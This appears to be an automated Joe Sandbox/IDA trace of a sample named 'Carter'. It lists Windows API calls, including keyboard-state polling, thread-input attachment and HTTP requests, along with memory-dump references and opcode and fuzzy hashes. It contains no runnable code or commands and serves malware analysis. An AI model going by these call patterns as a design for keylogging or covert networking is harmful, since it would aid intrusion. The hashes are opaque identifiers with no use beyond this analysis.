                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                                        • String ID: 0$F
                                                                        • API String ID: 176399719-3044882817
                                                                        • Opcode ID: 799e7434a4fb78b449cf102a4477406fe81423ca59beedbd8b09345009027acd
                                                                        • Instruction ID: c155aab1cfc57fe45991c562cbdc40aaae9b8d4d06ed7b73dbbd604d84d683fc
                                                                        • Opcode Fuzzy Hash: 799e7434a4fb78b449cf102a4477406fe81423ca59beedbd8b09345009027acd
                                                                        • Instruction Fuzzy Hash: 2A416A74A00209EFEB20DF68D884E9ABBF9FF49314F144169FA85A7354D736A910CF90
APIs
• MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 01067B83
• CreateCompatibleDC.GDI32(00000000), ref: 01067B8A
• SendMessageW.USER32(?,00000173,00000000,00000000), ref: 01067B9D
• SelectObject.GDI32(00000000,00000000), ref: 01067BA5
• GetPixel.GDI32(00000000,00000000,00000000), ref: 01067BB0
• DeleteDC.GDI32(00000000), ref: 01067BB9
• GetWindowLongW.USER32(?,000000EC), ref: 01067BC3
• SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 01067BD7
• DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 01067BE3
Memory Dump Source
• Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
• Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
Similarity
• API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
• String ID: static
APIs
• _memset.LIBCMT ref: 0100706B
  • Part of subcall function 01008D58: __getptd_noexit.LIBCMT ref: 01008D58
• __gmtime64_s.LIBCMT ref: 01007104
• __gmtime64_s.LIBCMT ref: 0100713A
• __gmtime64_s.LIBCMT ref: 01007157
• __allrem.LIBCMT ref: 010071AD
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 010071C9
• __allrem.LIBCMT ref: 010071E0
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 010071FE
• __allrem.LIBCMT ref: 01007215
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01007233
• __invoke_watson.LIBCMT ref: 010072A4
Similarity
• API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
• String ID:
APIs
• _memset.LIBCMT ref: 01042CE9
• GetMenuItemInfoW.USER32(010A7890,000000FF,00000000,00000030), ref: 01042D4A
• SetMenuItemInfoW.USER32(010A7890,00000004,00000000,00000030), ref: 01042D80
• Sleep.KERNEL32(000001F4), ref: 01042D92
• GetMenuItemCount.USER32(?), ref: 01042DD6
• GetMenuItemID.USER32(?,00000000), ref: 01042DF2
• GetMenuItemID.USER32(?,-00000001), ref: 01042E1C
• GetMenuItemID.USER32(?,?), ref: 01042E61
• CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 01042EA7
• GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 01042EBB
• SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 01042EDC
Similarity
• API ID: ItemMenu$Info$CheckCountRadioSleep_memset
• String ID:
APIs
• SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 010675CA
• SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 010675CD
• GetWindowLongW.USER32(?,000000F0), ref: 010675F1
• _memset.LIBCMT ref: 01067602
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 01067614
• SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 0106768C
Similarity
• API ID: MessageSend$LongWindow_memset
• String ID:
APIs
• SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 010377DD
• SafeArrayAllocData.OLEAUT32(?), ref: 01037836
• VariantInit.OLEAUT32(?), ref: 01037848
• SafeArrayAccessData.OLEAUT32(?,?), ref: 01037868
• VariantCopy.OLEAUT32(?,?), ref: 010378BB
• SafeArrayUnaccessData.OLEAUT32(?), ref: 010378CF
• VariantClear.OLEAUT32(?), ref: 010378E4
• SafeArrayDestroyData.OLEAUT32(?), ref: 010378F1
• SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 010378FA
• VariantClear.OLEAUT32(?), ref: 0103790C
• SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 01037917
Similarity
• API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
• String ID:
APIs
• GetKeyboardState.USER32(?), ref: 01040530
• GetAsyncKeyState.USER32(000000A0), ref: 010405B1
• GetKeyState.USER32(000000A0), ref: 010405CC
• GetAsyncKeyState.USER32(000000A1), ref: 010405E6
• GetKeyState.USER32(000000A1), ref: 010405FB
• GetAsyncKeyState.USER32(00000011), ref: 01040613
• GetKeyState.USER32(00000011), ref: 01040625
• GetAsyncKeyState.USER32(00000012), ref: 0104063D
• GetKeyState.USER32(00000012), ref: 0104064F
• GetAsyncKeyState.USER32(0000005B), ref: 01040667
• GetKeyState.USER32(0000005B), ref: 01040679
Similarity
• API ID: State$Async$Keyboard
• String ID:
APIs
  • Part of subcall function 00FE4D37: __itow.LIBCMT ref: 00FE4D62
  • Part of subcall function 00FE4D37: __swprintf.LIBCMT ref: 00FE4DAC
• CoInitialize.OLE32 ref: 01058AED
• CoUninitialize.OLE32 ref: 01058AF8
• CoCreateInstance.OLE32(?,00000000,00000017,01073BBC,?), ref: 01058B58
• IIDFromString.OLE32(?,?), ref: 01058BCB
• VariantInit.OLEAUT32(?), ref: 01058C65
• VariantClear.OLEAUT32(?), ref: 01058CC6
Similarity
• API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
• String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0104BB13
• GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0104BB89
• GetLastError.KERNEL32 ref: 0104BB93
• SetErrorMode.KERNEL32(00000000,READY), ref: 0104BC00
Similarity
• API ID: Error$Mode$DiskFreeLastSpace
• String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
APIs
  • Part of subcall function 00FF1A36: _memmove.LIBCMT ref: 00FF1A77
  • Part of subcall function 0103B79A: GetClassNameW.USER32(?,?,000000FF), ref: 0103B7BD
• SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 01039BCC
• GetDlgCtrlID.USER32 ref: 01039BD7
• GetParent.USER32 ref: 01039BF3
• SendMessageW.USER32(00000000,?,00000111,?), ref: 01039BF6
• GetDlgCtrlID.USER32(?), ref: 01039BFF
• GetParent.USER32(?), ref: 01039C1B
• SendMessageW.USER32(00000000,?,?,00000111), ref: 01039C1E
Similarity
• API ID: MessageSend$CtrlParent$ClassName_memmove
• String ID: ComboBox$ListBox
                                                                        APIs
                                                                        • GetParent.USER32 ref: 01039D27
                                                                        • GetClassNameW.USER32(00000000,?,00000100), ref: 01039D3C
                                                                        • _wcscmp.LIBCMT ref: 01039D4E
                                                                        • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 01039DC9
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: ClassMessageNameParentSend_wcscmp
                                                                        • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                        • API String ID: 1704125052-3381328864
                                                                        • Opcode ID: 83b9dafc4cf6e2974856baeaef8adc86a0d44fc6d585f5659fa8e722b6b495df
                                                                        • Instruction ID: fbcb6d2ea0ca703ec73e058651e9f35142dd7d5be71e568f6d2bc3f8b039ca90
                                                                        • Opcode Fuzzy Hash: 83b9dafc4cf6e2974856baeaef8adc86a0d44fc6d585f5659fa8e722b6b495df
                                                                        • Instruction Fuzzy Hash: 3511E776748303BEFB123625EC1BDE773ACEB45724F200156F980A90D5FBA659115A50
                                                                        APIs
                                                                        • VariantInit.OLEAUT32(?), ref: 01058FC1
                                                                        • CoInitialize.OLE32(00000000), ref: 01058FEE
                                                                        • CoUninitialize.OLE32 ref: 01058FF8
                                                                        • GetRunningObjectTable.OLE32(00000000,?), ref: 010590F8
                                                                        • SetErrorMode.KERNEL32(00000001,00000029), ref: 01059225
                                                                        • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,01073BDC), ref: 01059259
                                                                        • CoGetObject.OLE32(?,00000000,01073BDC,?), ref: 0105927C
                                                                        • SetErrorMode.KERNEL32(00000000), ref: 0105928F
                                                                        • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0105930F
                                                                        • VariantClear.OLEAUT32(?), ref: 0105931F
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                        • String ID:
                                                                        • API String ID: 2395222682-0
                                                                        • Opcode ID: 94b0c1c8680d68f2323205dcf39af2c2c479b48090e774c48bfc6ac918de807e
                                                                        • Instruction ID: 56d42a48d24401abec3ace75205d7d102be0063b082935aa84e5d33859004600
                                                                        • Opcode Fuzzy Hash: 94b0c1c8680d68f2323205dcf39af2c2c479b48090e774c48bfc6ac918de807e
                                                                        • Instruction Fuzzy Hash: F5C12171608305EFD780DF69C88496BBBE9BF89748F00495DF98A9B251CB31ED05CB92
                                                                        APIs
                                                                        • GetCurrentThreadId.KERNEL32 ref: 010419EF
                                                                        • GetForegroundWindow.USER32(00000000,?,?,?,?,?,01040A67,?,00000001), ref: 01041A03
                                                                        • GetWindowThreadProcessId.USER32(00000000), ref: 01041A0A
                                                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,01040A67,?,00000001), ref: 01041A19
                                                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 01041A2B
                                                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,01040A67,?,00000001), ref: 01041A44
                                                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,01040A67,?,00000001), ref: 01041A56
                                                                        • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,01040A67,?,00000001), ref: 01041A9B
                                                                        • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,01040A67,?,00000001), ref: 01041AB0
                                                                        • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,01040A67,?,00000001), ref: 01041ABB
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                        • String ID:
                                                                        • API String ID: 2156557900-0
                                                                        • Opcode ID: f37074505799f5ce8216016d3d2dfb3f8a02198b7cd007e92b90cebe078e5cb3
                                                                        • Instruction ID: 3e1672902d072a59352fe59191bc1fe70c353c60bf9f3bc7fcf5285e6845d49d
                                                                        • Opcode Fuzzy Hash: f37074505799f5ce8216016d3d2dfb3f8a02198b7cd007e92b90cebe078e5cb3
                                                                        • Instruction Fuzzy Hash: 1031E5B1500204BFEB71DF18DC84B697BFEEB55316F108166FB80D6189D7BAB9908B10
                                                                        APIs
                                                                        • GetSysColor.USER32(00000008), ref: 00FE260D
                                                                        • SetTextColor.GDI32(?,000000FF), ref: 00FE2617
                                                                        • SetBkMode.GDI32(?,00000001), ref: 00FE262C
                                                                        • GetStockObject.GDI32(00000005), ref: 00FE2634
                                                                        • GetClientRect.USER32(?), ref: 0101C0FC
                                                                        • SendMessageW.USER32(?,00001328,00000000,?), ref: 0101C113
                                                                        • GetWindowDC.USER32(?), ref: 0101C11F
                                                                        • GetPixel.GDI32(00000000,?,?), ref: 0101C12E
                                                                        • ReleaseDC.USER32(?,00000000), ref: 0101C140
                                                                        • GetSysColor.USER32(00000005), ref: 0101C15E
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
                                                                        • String ID:
                                                                        • API String ID: 3430376129-0
                                                                        • Opcode ID: be52645d3af9dd0155ce8808ca4ea03e8dee5412fb2bec1eaf95b22202d7b600
                                                                        • Instruction ID: e5d8e729ec361de34454a51a62aedf992f9c2a86436b0ee7b23dcff5e4d92273
                                                                        • Opcode Fuzzy Hash: be52645d3af9dd0155ce8808ca4ea03e8dee5412fb2bec1eaf95b22202d7b600
                                                                        • Instruction Fuzzy Hash: 0A117C31940244BFEB715FA4EC08BE97BA6FB4A331F104361FAA5A50D9CB760951EF10
                                                                        APIs
                                                                        • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00FEADE1
                                                                        • OleUninitialize.OLE32(?,00000000), ref: 00FEAE80
                                                                        • UnregisterHotKey.USER32(?), ref: 00FEAFD7
                                                                        • DestroyWindow.USER32(?), ref: 01022F64
                                                                        • FreeLibrary.KERNEL32(?), ref: 01022FC9
                                                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 01022FF6
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                        • String ID: close all
                                                                        • API String ID: 469580280-3243417748
                                                                        • Opcode ID: 19c6d9a2924bb0f805ccf7f5e8bab7d62602c667f32eb7b80ca751bd7efcec3f
                                                                        • Instruction ID: cfc1ba6742e8385c677b72c8b4d1cdc15d69bbef3888346c2848b19c43fedb3e
                                                                        • Opcode Fuzzy Hash: 19c6d9a2924bb0f805ccf7f5e8bab7d62602c667f32eb7b80ca751bd7efcec3f
                                                                        • Instruction Fuzzy Hash: 55A18C71701262CFCB69EF55C894B69F7A4BF04740F1042ACF98AAB261CB35AD12DF91
                                                                        APIs
                                                                        • EnumChildWindows.USER32(?,0103B13A), ref: 0103B078
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: ChildEnumWindows
                                                                        • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                        • API String ID: 3555792229-1603158881
                                                                        • Opcode ID: 5604dd98f4699bf888974b66cf3a8ac20ac7820aefde09a2f41da18259b21e10
                                                                        • Instruction ID: ffb41ed5bc5d5659f7b88942077099864a2e2c48f8158f3ccabd35b68b16b084
                                                                        • Opcode Fuzzy Hash: 5604dd98f4699bf888974b66cf3a8ac20ac7820aefde09a2f41da18259b21e10
                                                                        • Instruction Fuzzy Hash: 1191A370600106EEDB59EFA4C480BEDFBB8BF94304F508119E9DAE72A0DF306559DBA0
                                                                        APIs
                                                                        • SetWindowLongW.USER32(?,000000EB), ref: 00FE327E
                                                                          • Part of subcall function 00FE218F: GetClientRect.USER32(?,?), ref: 00FE21B8
                                                                          • Part of subcall function 00FE218F: GetWindowRect.USER32(?,?), ref: 00FE21F9
                                                                          • Part of subcall function 00FE218F: ScreenToClient.USER32(?,?), ref: 00FE2221
                                                                        • GetDC.USER32 ref: 0101D073
                                                                        • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0101D086
                                                                        • SelectObject.GDI32(00000000,00000000), ref: 0101D094
                                                                        • SelectObject.GDI32(00000000,00000000), ref: 0101D0A9
                                                                        • ReleaseDC.USER32(?,00000000), ref: 0101D0B1
                                                                        • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0101D13C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                        • String ID: U
                                                                        • API String ID: 4009187628-3372436214
                                                                        • Opcode ID: ea2dfc48c6500e50ff0e409b2c13a3d645aacbfa60cab01cc928b3b9d78ce5b6
                                                                        • Instruction ID: 3ecfa322301682b100a9b6dbed135b6d486537ea116acc7fa82e70351c6f523c
                                                                        • Opcode Fuzzy Hash: ea2dfc48c6500e50ff0e409b2c13a3d645aacbfa60cab01cc928b3b9d78ce5b6
                                                                        • Instruction Fuzzy Hash: D571C631900245EFDF228FA8C888AAA7BB5FF49360F1442A9FED55715AC73A8941DF50
                                                                        APIs
                                                                          • Part of subcall function 00FE29E2: GetWindowLongW.USER32(?,000000EB), ref: 00FE29F3
                                                                          • Part of subcall function 00FE2714: GetCursorPos.USER32(?), ref: 00FE2727
                                                                          • Part of subcall function 00FE2714: ScreenToClient.USER32(010A77B0,?), ref: 00FE2744
                                                                          • Part of subcall function 00FE2714: GetAsyncKeyState.USER32(00000001), ref: 00FE2769
                                                                          • Part of subcall function 00FE2714: GetAsyncKeyState.USER32(00000002), ref: 00FE2777
                                                                        • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 0106C69C
                                                                        • ImageList_EndDrag.COMCTL32 ref: 0106C6A2
                                                                        • ReleaseCapture.USER32 ref: 0106C6A8
                                                                        • SetWindowTextW.USER32(?,00000000), ref: 0106C752
                                                                        • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0106C765
                                                                        • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 0106C847
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                        • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                        • API String ID: 1924731296-2107944366
                                                                        • Opcode ID: 74a306b2e0c45e3df9f17855826078ea8838a3f8fc7ecd62ef913d8225c27d9e
                                                                        • Instruction ID: f3e636503e3e84902b8e66b1868dc558015d8eeb39ea20f354b0ad54c4dcd20a
                                                                        • Opcode Fuzzy Hash: 74a306b2e0c45e3df9f17855826078ea8838a3f8fc7ecd62ef913d8225c27d9e
                                                                        • Instruction Fuzzy Hash: 7A519A70604305AFE720EF24CC55FAA7BE5FB88310F00861DF5D59B2A1CB7AA945DB92
                                                                        APIs
                                                                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0105211C
                                                                        • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 01052148
                                                                        • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 0105218A
                                                                        • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0105219F
                                                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 010521AC
                                                                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 010521DC
                                                                        • InternetCloseHandle.WININET(00000000), ref: 01052223
                                                                          • Part of subcall function 01052B4F: GetLastError.KERNEL32(?,?,01051EE3,00000000,00000000,00000001), ref: 01052B64
                                                                          • Part of subcall function 01052B4F: SetEvent.KERNEL32(?,?,01051EE3,00000000,00000000,00000001), ref: 01052B79
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                                                        • String ID:
                                                                        • API String ID: 2603140658-3916222277
                                                                        • Opcode ID: 978d7d97c879a9885c659315b0bc0d1a12fafb1ffdc6f21bae2d71a8df71441a
                                                                        • Instruction ID: 7f69b95c954a8ddb460455915faf5aad59823d9b1b328d732e3a990c86ecef09
                                                                        • Opcode Fuzzy Hash: 978d7d97c879a9885c659315b0bc0d1a12fafb1ffdc6f21bae2d71a8df71441a
                                                                        • Instruction Fuzzy Hash: 95417BB5901209BEEB929F54CC89FBB7BACFF08350F00415AFE84AA185D7759944CBA0
                                                                        APIs
                                                                        • GetModuleFileNameW.KERNEL32(?,?,00000104,?,01070980), ref: 01059412
                                                                        • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,01070980), ref: 01059446
                                                                        • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 010595C0
                                                                        • SysFreeString.OLEAUT32(?), ref: 010595EA
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                                        • String ID:
                                                                        • API String ID: 560350794-0
                                                                        • Opcode ID: a6baa54ceca9bd85c10087ee1fcf61d4250877982d74b64a8d4c739cf5a0bd0f
                                                                        • Instruction ID: 162269b4903647da049865df6abcbef2ad6a7b1e654d5f4f38dd90d7d5ba6f0e
                                                                        • Opcode Fuzzy Hash: a6baa54ceca9bd85c10087ee1fcf61d4250877982d74b64a8d4c739cf5a0bd0f
